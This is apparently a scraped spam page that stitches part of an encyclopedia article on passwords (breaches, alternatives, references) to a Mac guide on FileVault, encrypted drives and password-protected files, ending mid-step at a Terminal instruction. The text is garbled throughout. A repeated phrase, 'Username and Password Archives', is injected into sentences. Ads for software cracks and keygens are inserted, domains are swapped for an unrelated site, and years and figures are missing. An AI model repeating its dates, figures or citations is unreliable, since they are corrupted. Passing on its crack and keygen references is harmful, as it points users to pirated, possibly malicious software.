  • In Decembera major password breach of the shoppingdowntown.us website occurred that led to the release of 32 million passwords. The hacker then leaked the full list of the 32 million passwords (with no other identifiable information) to the Internet. Passwords were stored in cleartext in the database and were extracted through a SQL injection vulnerability. The Imperva Application Defense Center (ADC) Username and Password Archives an analysis on the strength of the passwords.[65]
  • In JuneNATO (North Atlantic Treaty Organization) experienced a security breach that led to the public release of first and last names, usernames, and passwords for more than 11, registered users of their e-bookshop. The data was leaked as part of Operation AntiSec, a movement that includes Anonymous, Username and Password Archives, LulzSec, as well as other hacking groups and individuals. The aim of AntiSec is to expose personal, sensitive, and restricted information to the world, using any means necessary.[66]
  • On July 11,Booz Allen Hamilton, a consulting firm that does work for the Pentagon, had their servers hacked by Anonymous and leaked the same day. "The leak, dubbed 'Military Meltdown Monday,' includes 90, logins of military personnel—including personnel from USCENTCOM, SOCOM, the Marine corps, various Air Force facilities, Homeland Security, State Department staff, and what looks like private sector contractors."[67] These leaked passwords wound up being hashed in SHA1, and were later decrypted and analyzed by the ADC team at Imperva, revealing that even military personnel look for shortcuts and ways around the password requirements.[68]

Alternatives to passwords for authentication[edit]

The numerous ways in which permanent or semi-permanent passwords can be compromised has prompted the development of other techniques. Unfortunately, some are inadequate in practice, and in any case few have become universally available for users seeking a more secure alternative.[citation needed] A paper[69] examines why passwords have proved so hard to supplant (despite numerous predictions that they would soon be a thing of the past[70]); in examining thirty representative proposed replacements with respect to security, usability and deployability they conclude "none even retains the full set of benefits that legacy passwords already provide."

  • Single-use passwords. Having passwords that are only valid once makes many potential attacks ineffective. Most users find single-use passwords extremely inconvenient. They have, however, been widely implemented in personal online banking, where they are known as Transaction Authentication Numbers (TANs). As most home users only perform a small number of transactions each week, the single-use issue has not led to intolerable customer dissatisfaction in this case.
  • Time-synchronized one-time passwords are similar in some ways to single-use passwords, but the value to be entered is displayed on a small (generally pocketable) item and changes every minute or so.
  • PassWindow one-time passwords are used as single-use passwords, but the dynamic characters to be entered are visible only when a user superimposes a unique printed visual key over a server-generated challenge image shown on the user's screen.
  • Access controls based on public-key cryptography e.g. ssh. The necessary keys are usually too large to memorize (but see proposal Passmaze)[71] and must be stored on a local computer, security token or portable memory device, such as a USB flash drive or even floppy disk. The private key may be stored on a cloud service provider, and activated by the use of a password or two-factor authentication.
  • Biometric methods promise authentication based on unalterable personal characteristics, but currently () have high error rates and require additional hardware to scan,[needs update] for example, fingerprints, irises, etc. They have proven Username and Password Archives to spoof in some famous incidents testing commercially available systems, for example, the gummie fingerprint spoof demonstration,[72] and, because these characteristics are unalterable, they cannot be changed if compromised; this is a highly important consideration in access control as a compromised access token is necessarily insecure.
  • Single sign-on technology is claimed to eliminate the need for having multiple passwords. Such schemes do not relieve users and administrators from choosing reasonable single passwords, nor system designers or administrators from ensuring that private access control information passed among systems enabling single sign-on is secure against attack. As yet, no satisfactory standard has been developed.
  • Envaulting technology is a password-free way to secure data on removable storage devices such as USB flash drives. Instead of user passwords, access control is based on the user's access to a network resource.
  • Non-text-based passwords, such as graphical passwords or mouse-movement based passwords.[73] Graphical passwords are an alternative means of authentication for log-in intended to be used in place of conventional password; they use images, graphics or colours instead of letters, digits or special characters. One system requires users to select a series of faces as a password, utilizing the human brain's ability to recall faces easily.[74] In some implementations the user is required to pick from a series of images in the correct sequence in order to gain access.[75] Another graphical password solution creates a one-time password using a randomly generated grid of images. Each time the user is required to authenticate, they look for the images that fit their pre-chosen categories and enter the randomly generated alphanumeric character that appears in the image to form the one-time password.[76][77] So far, graphical passwords are promising, but are not widely used, Username and Password Archives. Studies on this subject have been made to determine its usability in the real world. While some believe that graphical passwords would be harder to crack, others suggest that people will be just as likely to pick common images or sequences as Express Systems Express Meter v3.0 crack serial keygen are to pick common passwords.[citation needed]
  • 2D Key (2-Dimensional Key)[78] is a 2D matrix-like key input method having the key styles of multiline passphrase, crossword, Username and Password Archives, ASCII/Unicode art, with optional textual semantic noises, to create big password/key beyond bits to realize the MePKC (Memorizable Public-Key Cryptography)[79] using fully memorizable private key upon the current private key management technologies like encrypted private key, split private key, and roaming private key.
  • Cognitive passwords use question and answer cue/response pairs to verify identity.

"The password is dead"[edit]

That "the password is dead" is a recurring idea in computer security. The reasons given often include reference to the usability as well as security problems of passwords, Username and Password Archives. It often accompanies arguments that the replacement of passwords by a more secure means of authentication is both necessary and imminent. This claim has been made by numerous people at least since [70][80][81][82][83][84][85][86]

Alternatives to passwords include biometrics, two-factor authentication or single sign-on, Microsoft's Cardspace, Username and Password Archives, the Higgins project, the Liberty Alliance, NSTIC, the FIDO Alliance and various Identity proposals.[87][88]

However, in spite of these predictions and efforts to replace them passwords are still the dominant form of authentication on the web. In "The Persistence of Passwords," Cormac Herley and Paul van Oorschot suggest that every effort should be made to end the "spectacularly incorrect assumption" that passwords are dead.[89] They argue that "no other single technology matches their combination of cost, immediacy and convenience" and that "passwords are themselves the best fit for many of the scenarios in which they are currently used."

Following this, Bonneau et al. systematically compared web passwords to 35 competing authentication schemes in terms of their usability, deployability, and security.[90][91] Their analysis shows that most schemes do better than passwords on security, some schemes do better and some worse with respect to usability, while every scheme does worse than passwords on deployability. The authors conclude with the following observation: "Marginal gains are often not sufficient to reach the activation energy necessary to overcome significant transition costs, Username and Password Archives, which may provide the best explanation of why we are likely to live considerably longer before seeing the funeral procession for passwords arrive at the cemetery."

See also[edit]

References[edit]

  1. ^ ab"passcode". YourDictionary. Retrieved 17 May
  2. ^ abWilliams, Shannon (21 Oct ). "Average person has passwords - study". NordPass. Retrieved April 28,
  3. ^ abGrassi, Paul A.; Garcia, Michael E.; Fenton, Username and Password Archives, James L. (June ). "NIST Special Publication Digital Identity Guidelines", Username and Password Archives. National Institute of Standards and Technology (NIST). doi/shoppingdowntown.us Retrieved 17 May
  4. ^"authentication protocol". Computer Security Resource Center (NIST). Retrieved 17 May
  5. ^"Passphrase". Computer Security Resource Center (NIST). Retrieved 17 May
  6. ^Polybius on the Roman MilitaryArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  7. ^Mark Bando (). st Airborne: The Screaming Eagles in World War II. Mbi Publishing Company. ISBN&#. Archived from the original on 2 June Retrieved 20 May
  8. ^McMillan, Robert (27 January ). "The World's First Computer Password? It Was Useless Too". Wired magazine. Retrieved 22 March
  9. ^Hunt, Troy (26 July ). "Passwords Evolved: Authentication Guidance for the Modern Era". Retrieved 22 March
  10. ^CTSS Programmers Guide, 2nd Ed., MIT Press,
  11. ^Morris, Robert; Thompson, Ken (). "Password Security: A Case History". Bell Laboratories. CiteSeerX&#;
  12. ^Vance, Ashlee (). "If Your Password IsJust Make It HackMe". The New York Times. Archived from the original on
  13. ^"Managing Network Security". Archived from the original on March 2, Retrieved CS1 maint: bot: original URL status unknown (link). Fred Cohen and Associates. shoppingdowntown.us Retrieved on
  14. ^ abcdLundin, Leigh (). "PINs and Passwords, Part 2". Passwords. Orlando: SleuthSayers.
  15. ^The Memorability and Security of PasswordsArchived at the Wayback Machine (pdf). shoppingdowntown.us Retrieved on
  16. ^Michael E. Whitman; Herbert J. Mattord (). Principles of Information Security. Cengage Learning, Username and Password Archives. p.&#; ISBN&#.
  17. ^"How to Create a Random Password Generator". PCMAG. Retrieved
  18. ^Lewis, Dave (), Username and Password Archives. Ctrl-Alt-Delete. p.&#; ISBN&#. Retrieved 10 July
  19. ^Techlicious / Fox Van Allen @techlicious (). "Google Reveals the 10 Worst Password Ideas &#; shoppingdowntown.us", Username and Password Archives. shoppingdowntown.us Archived from the original on Retrieved
  20. ^Fleishman, Glenn (November 24, ). "Write your passwords down to improve safety — A counter-intuitive notion leaves you less vulnerable to remote attack, not more". MacWorld. Retrieved April 28,
  21. ^ abLyquix Blog: Do We Need to Hide Passwords?Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  22. ^Jonathan Kent Malaysia car thieves steal fingerArchived at the Wayback Machine. BBC ()
  23. ^Stuart Brown "Top ten passwords used in the United Kingdom". Archived from the original on November 8, Username and Password Archives, Retrieved . shoppingdowntown.us (). Retrieved on
  24. ^US patent &#;
  25. ^Wilkes, M. V. Time-Sharing Computer Systems. American Elsevier, New York, ().
  26. ^Schofield, Jack (10 March ). "Roger Needham". The Guardian.
  27. ^The Bug Charmer: Passwords MatterArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  28. ^ abAlexander, Steven, Username and Password Archives. () The Bug Charmer: How long should passwords be?Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  29. ^"shoppingdowntown.us - Password Hashing Schemes"Archived at the Wayback Machine.
  30. ^ abFlorencio et al., An Administrator's Guide to Internet Password ResearchArchived at the Wayback Machine. (pdf) Retrieved on
  31. ^Cracking Story – How I Cracked Over Million SHA1 and MD5 Hashed Passwords «&#;Thireus' Bl0gArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  32. ^ abMorris, Robert & Thompson, Ken (). "Password Security: A Case History". Communications of Username and Password Archives ACM. 22 (11): – CiteSeerX&#; doi/ S2CID&#; Archived from the original on
  33. ^Password Protection for Modern Operating SystemsArchived at the Wayback Machine (pdf). shoppingdowntown.us Retrieved on
  34. ^How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databasesArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  35. ^"Why You Should Lie When Setting Up Password Security Questions". Techlicious. Archived from the original on Retrieved
  36. ^ abJoseph Steinberg (12 November ). "Forbes: Why You Should Ignore Everything You Have Been Told About Choosing Passwords". Forbes. Archived from the original on 12 November Retrieved 12 November
  37. ^"The problems with forcing regular password expiry". IA Matters. CESG: the Information Security Arm of GCHQ. 15 April Archived from the original on 17 August Retrieved 5 Aug
  38. ^Schneier on Security discussion on changing passwordsArchived at the Wayback Machine. shoppingdowntown.us Retrieved on
  39. ^Seltzer, Larry. () "American Express: Strong Credit, Weak Passwords"Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  40. ^"Ten Windows Password Myths"Archived at the Wayback Machine: "NT dialog boxes limited passwords to a maximum of 14 characters"
  41. ^"You must provide a password between 1 and 8 characters in length". shoppingdowntown.us Retrieved on Archived May 21,at the Wayback Machine
  42. ^"To Capitalize or Not to Capitalize?"Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  43. ^Thomas, Keir (February 10, ). "Password Reuse Is All Too Common, Research Shows", Username and Password Archives. PC World. Archived from the original on August 12, Retrieved August 10,
  44. ^Pauli, Darren (16 July ). "Microsoft: You NEED bad passwords and should re-use them a lot". The Register. Archived from the original on 12 August Retrieved 10 August
  45. ^Bruce Schneier&#;: Crypto-Gram NewsletterArchived at the Wayback Machine May 15,
  46. ^"Ten Windows Password Myths"Archived at the Wayback Machine: Myth #7. You Should Never Write Down Your Password
  47. ^Kotadia, Munir () Microsoft security guru: Jot down your passwords. shoppingdowntown.us Retrieved on
  48. ^"The Strong Password Dilemma"Archived at the Wayback Machine by Richard E. Smith: "we can summarize classical password selection rules as follows: The password must be impossible to remember and never written down."
  49. ^Bob Jenkins (). "Choosing Random Passwords". Archived from the original on
  50. ^"The Memorability and Security of Passwords – Some Empirical Results"Archived at the Wayback Machine (pdf)
    "your password in a secure place, such as the back of your wallet or purse."
  51. ^"Should I write down my passphrase?"Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  52. ^Jaffery, Saman M. (17 October ). "Survey: 11% of Brits Include Internet Passwords in Will". Hull & Hull LLP. Archived from the original on 25 December Retrieved 16 July
  53. ^Two-factor authenticationArchived at the Wayback Machine
  54. ^Improving Usability of Password Management with Standardized Password PoliciesArchived at the Wayback Machine (pdf). Retrieved on
  55. ^ abHate silly password rules? Username and Password Archives does the guy who created them, ZDNet
  56. ^The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!, Wall Street Journal
  57. ^ abExperts Say We Can Finally Ditch Those Stupid Password Rules, Fortune
  58. ^NIST’s new password rules – what you need to know, Naked Security
  59. ^P. Tsokkis and E. Stavrou, "A password generator tool to increase users' awareness on bad password construction strategies," International Symposium on Networks, Computers and Communications (ISNCC), Username and Password Archives, Rome,pp.doi/ISNCC
  60. ^"Password". Username and Password Archives from the original on April 23, Retrieved CS1 maint: bot: original URL status unknown (link), Username and Password Archives. shoppingdowntown.us
  61. ^Schneier, Real-World PasswordsArchived at the Wayback Machine. shoppingdowntown.us Retrieved on
  62. ^MySpace Passwords Aren't So DumbArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  63. ^"CERT IN". Retrieved
  64. ^ abUrbina, Ian; Davis, Leslye (November 23, ). "The Secret Life of Passwords". The New York Times. Archived from the original on November 28, Username and Password Archives,
  65. ^"Consumer Password Worst Practices (pdf)"(PDF). Archived(PDF) from the original on
  66. ^"NATO site hacked". The Register. Archived from the original on June 29, Retrieved July 24,
  67. ^"Anonymous Leaks 90, Military Email Accounts in Latest Antisec Attack". Archived from the original on
  68. ^"Military Password Analysis". Archived from the original on
  69. ^"The Quest to Replace Passwords (pdf)"(PDF). IEEE. Archived(PDF) from the original on Retrieved
  70. ^ ab"Gates predicts death of the password". CNET. Archived from the original on Retrieved
  71. ^Cryptology ePrint Archive: Report /Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  72. ^T Matsumoto. H Matsumotot; K Yamada & S Hoshino (). "Impact of artificial 'Gummy' Fingers on Fingerprint Systems". Proc SPIE. Optical Security and Counterfeit Deterrence Techniques IV. : BibcodeSPIEM. doi/ S2CID&#;
  73. ^Using AJAX for Image Passwords – AJAX Security Part 1 of 3Archived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  74. ^Butler, Rick A. () Face in the CrowdArchived at the Wayback Machine. shoppingdowntown.us Retrieved on
  75. ^graphical password or graphical user authentication (GUA)Archived at the Wayback Machine. shoppingdowntown.us Retrieved on
  76. ^Ericka Chickowski (). "Images Could Change Username and Password Archives Authentication Picture". Dark Reading. Archived from the original on
  77. ^"Confident Technologies Delivers Image-Based, Multifactor Authentication to Strengthen Passwords on Public-Facing Websites". Archived from the original on
  78. ^User Manual for 2-Dimensional Key (2D Key) Input Method and SystemArchived at the Wayback Machine. shoppingdowntown.us (). Retrieved on
  79. ^Kok-Wah Lee "Methods and Systems to Create Big Memorizable Secrets and Their Applications" Patent USArchived at the Wayback Machine, WO Filing date: December 18,
  80. ^Kotadia, Username and Password Archives, Munir (25 February ). "Gates predicts death of the password". ZDNet. Username and Password Archives 8 May
  81. ^"IBM Reveals Five Innovations That Will Change Our Lives within Five Years". IBM. Archived from the original on Retrieved
  82. ^Honan, Mat (). "Kill the Password: Why a String of Characters Can't Protect Us Anymore", Username and Password Archives. Wired. Archived from the original on Retrieved
  83. ^"Google security exec: 'Passwords are dead'". CNET. Archived from the original on Retrieved
  84. ^"Authentciation at Scale". IEEE. Archived from the original on Retrieved
  85. ^Mims, Christopher (). "The Password Is Finally Dying. Here's Mine". Wall Street Journal. Archived from the original on Retrieved
  86. ^"Russian credential theft shows why the password is dead". Computer World. Archived from the original on Retrieved
  87. ^"NSTIC head Jeremy Grant wants to kill passwords". Fedscoop. Archived from the original on Retrieved
  88. ^"Specifications Overview". FIDO Alliance. Archived from the original on Retrieved
  89. ^"A Research Agenda Acknowledging the Persistence of Passwords". IEEE Security&Privacy. Jan Archived from the original on Retrieved
  90. ^Bonneau, Joseph; Herley, Cormac; Oorschot, Paul C. van; Stajano, Frank (). "The Quest to Replace Passwords: A Framework for Comparative Evaluation of Web Authentication Schemes". Technical Report - University of Cambridge. Computer Laboratory. Cambridge, UK: University of Cambridge Computer Laboratory. ISSN&#; Retrieved 22 March
  91. ^Bonneau, Joseph; Herley, Cormac; Oorschot, Paul C. van; Stajano, Frank (). The Quest to Replace Passwords: A Framework for Comparative Evaluation of Web Authentication Schemes, Username and Password Archives. IEEE Symposium on Security and Privacy. San Francisco, CA. pp.&#;– doi/SP

External links[edit]

Источник: Username and Password Archives

How to Encrypt and Password Protect Files on Your Mac

How To

Posted on April 16th, by Jay Vrijenhoek and Kirk McElhearn

How to Encrypt Files on Mac

To protect your sensitive data, you should use encryption and password protection wherever possible; macOS provides you with a number of ways to implement it. Best of all, you can do this with built-in software and features that are part of macOS.

This article covers five areas where you can encrypt or password protect files:

  1. Encrypt System Data and Your Startup Drive
  2. Encrypt External Drives
  3. Encrypt Documents and Files
  4. Encrypt Username and Password Archives Files You Send to Others

Encrypt System Data and Your Startup Drive

The best way to prevent unauthorized access to your data is to encrypt your startup drive. But Username and Password Archives should also set a password to protect your Mac when the screensaver is active, and you can set a firmware password to prevent someone from starting up your Mac from an external drive.

Using FileVault to Encrypt Your Startup Drive

FileVault, the built-in full-disk encryption feature in macOS, is a robust way to encrypt the contents of your entire startup drive, Username and Password Archives. It is important to use a strong password to secure your user account, because that password not only gives you access to your account, but it also unlocks your drive. A simple password (&#;,&#; or &#;password1,&#; etc.) is easy to guess and will allow anyone to log in, thus bypassing FileVault protection.

To enable FileVault, follow these steps:

  1. From the Apple menu, choose System Preferences.
  2. Go to the Security & Privacy pane.
  3. Click the FileVault tab.
  4. Click the padlock to make changes, then click Turn On FileVault&#;

    You will be asked to choose a method to unlock your disk if you ever lose your account password.

    If you choose to use your iCloud account, Apple will store the recovery key for your disk on its servers, and you&#;ll have to provide questions and answers for three security questions that will unlock the disk.

    The recovery key method is more secure, since if someone gets access to your user data, they may have your Apple ID and its password, but you have to make sure that you can store it safely. If you use a password manager, you can store it there, and you&#;ll be able to access it from your iPhone or iPad if necessary.

    If you select the iCloud option, you Username and Password Archives be prompted to restart your Mac and the encryption process will begin. However, if you select recovery key an additional window will show with that key.

  5. The encryption process will begin, and you can use your Mac as you always would. You probably won&#;t YouCam4 crack serial keygen any performance hit as FileVault encrypts your disk, and, depending on the size of your Mac&#;s drive, this will take from a few hours to overnight. Your Mac has to be plugged in for the encryption process to advance, so if you have a laptop make sure to connect it to power. And encryption only occurs when the Mac is awake.
    In the future, you&#;ll have to log into your Mac each time you start it up, and each time you wake it from sleep. You can&#;t use automatic login on a Mac with FileVault.

Activating a Screensaver Password

FileVault protects your data at rest, meaning if the Mac is off, sleeping or you are logged out, a password is required to get access. Once you are logged in the data is accessible to you or anyone else that can sit at your Mac while you&#;re not looking. To prevent this, you should set a password so when your Mac is asleep, or when a screensaver is active, a password is required to access the Mac. And if you set a password like this, it&#;s easy to lock your Mac, without even clicking your mouse.

To enable the sleep and screensaver password, Username and Password Archives, Mirillis Action 4.0.3 free download Archives here and follow these steps:

    1. From the Apple menu, Username and Password Archives, choose System Preferences.
    2. Go to the Security & Privacy pane.
    3. Click the General tab.

    1. Click the padlock to make changes, then check the Require password — after sleep or screen saver begins. The dropdown menu offers you options as to how soon the password protection should kick shoppingdowntown.us&#;s best to choose immediately here; that way, you don&#;t have to worry about how long it takes before your Mac is protected. And if you choose this setting, you can set a hot corner that will activate your screen saver when your mouse pointer reaches a specified corner of your display.

      To do this, go back the Desktop & Screen Saver pane of System Preferences. Click the Screen Saver tab, then, at the bottom of the window, click the Hot Corners&#; button.

Hot corner actions occur when you move your cursor into one of the corners of your screen. As you can see below, I have four actions set for the four corners of my display. At the top left is Put Display to Sleep. Since my security settings require a password immediately after the display is asleep, this provides instant protection from prying eyes.

You can also put your Mac to sleep by pressing Option–Command–Media Eject, if you want, but if you leave it running with the screen saver, then operations can continue while you&#;re away from your Mac.

Setting a Firmware Password

To prevent unauthorized users from starting up your Mac from another drive, or from the recovery partition, Username and Password Archives, you can set a firmware password. Once set, when you start your Mac from your normal startup disk, you see the normal login window where you enter your user account password. If you try to start up from another drive, or from macOS Recovery, your Mac pauses startup and displays a lock icon with a password field instead.

However, you can only set a firmware password on an Intel Mac; the new Macs with Apple&#;s own processors do not support this, Username and Password Archives. Apple recommends the use of FileVault to protect your data on these Macs, and, to be honest, if you are using FileVault even on an Intel Mac, you probably don&#;t need a firmware password.

To set a firmware password, Username and Password Archives, follow these steps:

      1. Restart your Mac and hold down Command+R as soon as the screen turns black. Your Mac will now boot from the recovery partition. This may take longer than usual but just keep holding down the keys until you see a progress bar.
      2. When the Mac finishes starting up, you should see the Utilities window.
      3. Select Utilities from the menu bar and then choose Firmware Password Utility.
      4. Click Turn On Firmware Password, enter a password, then click Set Password. Make sure to keep a record of the password, in Username and Password Archives password manager on another device, for example.
      5. Quit the Utility, then choose Apple Menu > Restart, to restart your shoppingdowntown.us&#;ll only be asked for the firmware password if someone is attempting to start your Mac from a drive other than the one selected in the Startup Disk pane of System Preferences. If you want to start up from another drive, without having to enter the firmware password, you can change the startup drive, then click Restart in that preference pane.

Encrypt External Drives

FileVault takes care of your startup drive, but what if you have other drives? You may have one or more external drive that you use to store data or for backups; portable drives that you use to Username and Password Archives files to and from work; and even USB thumb drives. You may also have drives that are formatted with two or more partitions, and you can choose to encrypt certain partitions on these drives, if you want. You can encrypt these drives manually to protect their data.

Encrypting Drives and Partitions (Option 1)

To encrypt a drive or partition using the Finder, follow these steps:

      1. Anything can happen from a sudden drive failure to a power outage so always make sure you have a current backup.
      2. Right-click on the drive icon on your Desktop, Username and Password Archives, in a Finder window, or in the Finder sidebar.
      3. Choose Encrypt. A dialog displays inviting you to set a password, type it a second time, and enter a password hint. The password hint is required, so you cannot leave it blank, Username and Password Archives. If you think you need a hint, set one Username and Password Archives only makes sense to you. Since you will need to enter the password after every restart or every time you connect the drive, the chances of forgetting that password are slim, so you may not need a hint. If you don&#;t think you&#;ll forget the password, set a hint that makes no sense at all and will only confuse an unauthorized person.
      4. Click Encrypt Disk and let it work for you in the background. When the encryption has completed, you&#;ll see Decrypt in the contextual menu when you right-click on the drive, Username and Password Archives. If you ever want to turn off the encryption, choose Decrypt and enter the password, and macOS will decrypt the drive and remove its encryption.

Note that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

Encrypting Drives and Partitions (Option 2)

You can also encrypt drives or partitions through Disk Utility, but it will require you to erase them in the process. For new or empty hard drives or drives that still ned to be partitioned, Disk Utility is a good option since you&#;re likely already using it Username and Password Archives to handle the partitioning.

To encrypt a drive or partition using Disk Utility, follow these steps:

      1. Open Disk Utility; it&#;s in the Utilities folder in your Applications folder.
      2. Select the drive or partition you want to encrypt. In this example, Username and Password Archives, I&#;m using a USB thumb drive, but you can do this on any drive, Username and Password Archives, other than your startup drive. Make sure that you&#;ve backed up the data on the drive, because the next step erases it completely.
      3. Click Erase. In the dialog that displays, name the drive, then click the Format menu. In macOS Big Sur, you have to use the APFS format to encrypt drives: choose APFS (Encrypted). Enter a password, type the password again in the Verify field, then enter a password hint; it&#;s not required here, but it is recommended.
      4. Click Choose when done, and the drive or partition will be erased and shoppingdowntown.us that when you encrypt drives on macOS Big Sur, they are converted to the APFS format, which is not readable by Macs running versions of macOS older than High Sierra.

You can verify the encryption is in place by clicking that same drive again in Disk Utility. It will now show that the drive is formatted in an encrypted format as shown in the screenshot below.

Going forward, every time you restart your Mac or mount the drive, a window like this displays:

If you save the password in your keychain, then you won&#;t need to enter it again. However, if someone manages to get into your account, the drive will mount automatically. So it&#;s better protected to not save the password, but you&#;ll need to remember it, and it&#;s more likely that people choose weaker passwords when they have to remember them.

Encrypting Disk Images

You can also create encrypted disk images to store files. Think of these as folders with their own encryption, Username and Password Archives. Even if the hard drive the data is on is already encrypted, Username and Password Archives, some want an additional layer of security for certain files or folders, and an encrypted disk image has its own password.

You can create two types of disk images: you can create standard disk images, Username and Password Archives, with a fixed size, or you can create &#;sparse images&#; for which you define a maximum size, but which only use the amount of space of the files you&#;ve added. However, these disk images can grow as you add more files to them. The Username and Password Archives applies to any files or folders you add to the disk image.

To create an encrypted disk image using Disk Utility, follow these steps:

      1. Open Disk Utility; it&#;s in the Utilities folder of your Application folder.
      2. Choose File > New Image > Blank Image. If you want to create a disk image from an existing folder, choose File > New Image > Image From Folder.
      3. The following dialog displays:

        Depending on your needs, this can be set up in different ways, Username and Password Archives. I&#;ll stick with the scenario that fits the most common uses.

      4. There are a number of configuration options and settings:
        • The Save As file name is what you&#;ll see in the Finder, such as shoppingdowntown.us
        • In Where, choose a location to save the disk image.
        • The Name is what displays on your Desktop after you double click the disk image.
        • For Format, close APFS for a Mac that has an SSD and is running macOS or later. Choose Mac OS Extended (Journaled) if you want to use the disk image on a Mac running macOS or earlier. If you want to access the disk image on Windows, and it&#;s 32 GB or smaller, choose MS-DOS (FAT); for Windows above 32 GB, choose ExFAT.
        • For Partitions, let Disk Utility set the appropriate option according to the format you choose.
        • For Image Format, you can choose read/write disk image for standard disk images, or you can choose sparse image or sparse image bundle if you want a disk image that will expand as you add files.
        • Select the Size of the disk image. In general, you either know how many files you want to put in your disk image, or you want to leave space to add more files, Username and Password Archives. If you choose a read/write disk image, set the size for what you need, Username and Password Archives, leaving room to add more files if necessary. The disk image will take up that amount of space on your drive, Username and Password Archives. However, if you choose sparse image, set the maximum size you want for the disk image. The disk image won&#;t take up much size right away, but will grow as you add or remove files. An empty sparse image is less than 10 MB, but as you add more files it will grow. So don&#;t hesitate; set it to 1 Username and Password Archives or more.
        • Next choose the Encryption level. There are two encryption options, and if you have a lot of files, and a large disk image, you should choose bit encryption, Username and Password Archives. bit encryption is more secure, but slower, though if you have a recent Mac it should have on trouble working with that level of encryption. Click Save when everything is set up and Disk Utility creates the disk image, then the Finder opens and mounts the disk image; you&#;ll find it on your Desktop or in the Finder sidebar.
      5. Select the disk image you just created and press Command+i or right click on it and select &#;Get Info.&#;

        The reason I recommend using the sparse disk image now becomes clear. I set the disk image to be 1 GB, but it only takes up MB on my drive. This is because the sparse disk image format grows in size when needed, until it reaches the size you set in Disk Utility; in my case, this is 1 GB. If you find you need a bigger disk image down the road, just create a new one and copy the data over.

      6. If you want to encrypt an existing folder, select the folder you want to encrypt, set a name, Username and Password Archives, encryption strength, and format (read/write if you want to make changes to the contents later on).

Keep in mind that this disk image, created from a folder, will not be able to store more files than what&#;s already there. This makes the Image From Folder method a good one for long term storage of files you&#;re done with. If you need to frequently access the contents or add to it, a sparse disk image, or a read/write disk image, of a size larger than the files you currently want to store in it, is a better way to go.

Encrypt Documents and Files

Data has to leave your Username and Password Archives, and for any number of reasons. It&#;s safe on your Mac, if Username and Password Archives take the precautions explained in this article, but what if you need to email or message a document or file to someone? There are several ways to password protect your documents and files, depending on the type of files.

Password Protecting through the Preview App

The Preview app is versatile and often underestimated. One of the things it can do for you is encrypt files, allowing you to protect them with a password.

To password protect a file using Preview, follow these steps:

      1. Open any PDF file or image in Preview. On macOS, you can save any file as a PDF from the Print menu. Choose File > Print, then click the PDF menu and choose Save as PDF.
      2. From the File menu, select Export as PDF&#;
      3. In the save dialog, that drops down, rename your file if you want, then click the Show Details button at the bottom.
      4. You&#;ll see an option to enable encryption and set a password.
      5. Once a password is set and the file is saved, when you open the PDF file it will prompt for a password.

The above steps will work for any image or document that Preview can open.

Password Protecting an Existing PDF through the Print Dialog

You may already have a PDF that you would like to protect with a password. This can also be done using the Preview app. This works for almost any file, image, or document, and from most applications that support the standard macOS print options. This could be an image opened in the Preview app, a website viewed in Safari, or a TextEdit document. Keep in mind that this method will always result in a PDF file so you lose the ability to edit. It is, however, ideal for quickly protecting a file if it has to be Username and Password Archives to someone.

To password protect a file using the Print Dialog, follow these steps:

      1. In the application you are viewing the file with, choose File > Print.
      2. Click the PDF button in the bottom of the dialog, and choose Save as PDF from the popup menu.
      3. Click the Security Options button.
      4. A window displays with more options than you saw above, when exporting to PDF. You can set a password that&#;s Username and Password Archives to open the file, but you can also limit someone&#;s ability to copy from and print the document; these must Username and Password Archives different Username and Password Archives the main password. Click OK, then save the file.

As you can see there are several routes here to the same destination. Your needs may vary slightly, so pick what works for you in that moment.

Password Protecting Pages, Numbers, and Keynote Documents

If you create a new document in Pages, Numbers, or Keynote there is no need to save your document as a PDF. You can password protect the actual document and Username and Password Archives it as an editable file. To password protect your Pages, Numbers or Keynote document, follow these steps:

      1. With your document open, choose File > Set Password.
      2. Enter a password, enter it a second time in the Verify field, then click Set Password.
      3. Another way to password protect your Pages, Numbers, or Keynote file is by using the Share menu. Choose Share > Send a Copy, choose how you want to send the file, Username and Password Archives check Require password to open, and enter a password.
      4. A window opens which, among other things, will let you set a password.
      5. You can also select a file type. These options differ slightly depending on the application you&#;re using, and some, Username and Password Archives, but not all of them, will offer a password protection option.

Password Protecting Word, Excel, and PowerPoint Documents

The Office apps &#; Word, Excel, and PowerPoint, allow you to password protect documents. Each of the three apps does this a bit differently.

Microsoft Word

In Microsoft Word, click the Review tab, then click Protect in the ribbon and choose Protect Document. A dialog displays giving you options to password protect a document for opening and modifying the document, as well as other options.

Microsoft Excel

In Excel, you can password protect a spreadsheet by choosing File > Passwords. A small dialog displays, where you can set a password to open the document, and to modify it.

Microsoft PowerPoint

As above with Excel, you choose File > Passwords to protect a PowerPoint presentation. You can set a password to protect a document from opening and another to protect it from modification.

Creating a Password Protected .zip Archive

If, for whatever reason, you cannot password protect the file or folder you want to secure, such as if the file needs to be compatible with another operating system, wrapping files or a folder in a .zip archive can come in handy. Any file, whether it&#;s an image, document or video, can be archived. Size is not an issue, but will depend on what you do with the archive once it&#;s created. You may, for example, have limitations to the size of attachments, if you want to send it by email. However, you can send attachments using MailDrop; see this article for more on MailDrop, and for a number of ways to securely send files.

Creating a password protected archive is convenient if you need to send files quickly and securely, and if the archive needs to be compatible with other operating system. If you send this type of archive to a Windows user, they can open it. If you plan on creating large archives for storage or to transport on a flash drive, Username and Password Archives, I recommend using the above mentioned encrypted disk image instead. Creating a password-protected zip archive is, unfortunately, not as easy as the above mentioned methods; it requires the use of the command line.

To create a password protected .zip archive, follow these steps:

Archiving a Single File

      1. Open the Terminal app which can be found in the Utilities folder inside your Applications folder. When Terminal opens you will see a default string of text like this:

